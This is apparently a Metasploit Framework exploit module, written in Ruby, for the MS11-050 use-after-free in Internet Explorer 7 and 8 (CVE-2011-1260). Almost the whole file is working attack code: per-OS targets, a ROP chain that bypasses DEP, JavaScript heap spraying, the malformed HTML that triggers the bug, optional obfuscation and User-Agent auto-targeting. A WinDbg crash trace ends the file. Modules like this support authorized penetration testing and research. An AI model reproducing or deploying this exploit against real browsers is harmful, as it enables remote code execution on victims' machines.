metasploit-framework/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelem...

315 lines
9.9 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "7.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil,
})
def initialize(info={})
super(update_info(info,
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
'Description' => %q{
This module exploits a use-after-free vulnerability in Internet Explorer. The
vulnerability occurs when an invalid <object> tag exists and other elements
overlap/cover where the object tag should be when rendered (due to their
styles/positioning). The mshtml!CObjectElement is then freed from memory because
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
a reference to the freed <object> and attempts to call a function on it, leading
to the use-after-free.
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
to bypass DEP (Data Execution Prevention).
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'Author' =>
[
'd0c_s4vage', #Discovery, poc
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
'bannedit', #Windows 7
],
'References' =>
[
['CVE', '2011-1260'],
['OSVDB', '72950'],
['MSB', 'MS11-050'],
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
# In IE6 the mshtml!CObjectElement size is 0xac
[
'Internet Explorer 7 on XP SP3',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 7 on Windows Vista',
{
'Rop' => false,
'Ret' => nil, #Not required for non-ROP targets
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xB0', #mshtml!CObjectElement size
'Offset' => '0x01',
}
],
[
'Internet Explorer 8 on XP SP3',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5E2',
}
],
[
'Internet Explorer 8 on Windows 7',
{
'Rop' => true,
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
'TargetAddr' => 0x0c0c0c0c, #For vtable
'ObjSize' => '0xE0', #mshtml!CObjectElement size
'Offset' => '0x5F4',
}
],
[ 'Debug Target (Crash)', {} ],
],
'DisclosureDate' => "Jun 16 2011",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + IE7
mytarget = targets[1]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
#Windows Vista + IE7
mytarget = targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP + IE8
mytarget = targets[3]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
#Windows 7 + IE8
mytarget = targets[4]
else
mytarget = nil
end
return mytarget
end
def on_request_uri(cli, request)
#Set default target
mytarget = target
debug = false
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if mytarget.nil?
print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
send_not_found(cli)
return
end
elsif target.name =~ /Debug/
debug = true
end
if debug
data = <<-DATA
<html>
<body>
<script language='javascript'>
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
document.body.innerHTML += "AAAAAAA";
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
</script>
</body>
</html>
DATA
print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
send_response(cli, data, { 'Content-Type' => 'text/html' })
return
end
#In case we're using ROP, initialize it now
code = ''
if mytarget['Rop']
# !mona -m msvcr71 rop
code = [
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c354901, # POP EBX # RETN [msvcr71.dll]
0xffffffff,
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c364802, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].pack("V*")
code << "\x90"*20 #Nops
code << "\xeb\x04\xff\xff" #Jmp over the pivot
code << [mytarget.ret].pack('V') #Stack pivot
end
code << payload.encoded
# fill the vtable
vtable = [mytarget['TargetAddr']].pack('V*')
#Convert code format so we can unescape() in JavaScript
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
#Extract string based on what the setup is
if mytarget.name == 'Internet Explorer 8 on XP SP3'
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
else
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
end
js = <<-JS
function timedRefresh(timeoutPeriod) {
setTimeout("location.reload(true);",timeoutPeriod);
}
function enable_lfh(heaplib_obj, obj_size, max) {
var vtable = unescape("#{vtable_js}");
while (vtable.length < obj_size) vtable += vtable;
var obj = vtable.substring(0, (obj_size-6)/2);
for (var i=1; i < max; i++) {
heaplib_obj.alloc(obj);
}
}
function heap_spray(heaplib_obj, offset) {
var code = unescape("#{code_js}");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x1000) nops += nops;
offset = nops.substring(0, #{mytarget['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heaplib_obj.gc();
for (var i2=0; i2 < 0x400-1; i2++) {
heaplib_obj.alloc(block);
}
}
heap = new heapLib.ie(0x20000);
heap_spray(heap, #{mytarget['Offset']});
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
timedRefresh(2000);
JS
js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
html = <<-HTML
<html>
<body>
<script language='javascript'>
#{js}
</script>
</body>
</html>
HTML
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport} (#{mytarget.name})...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
(b00.1ac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
=end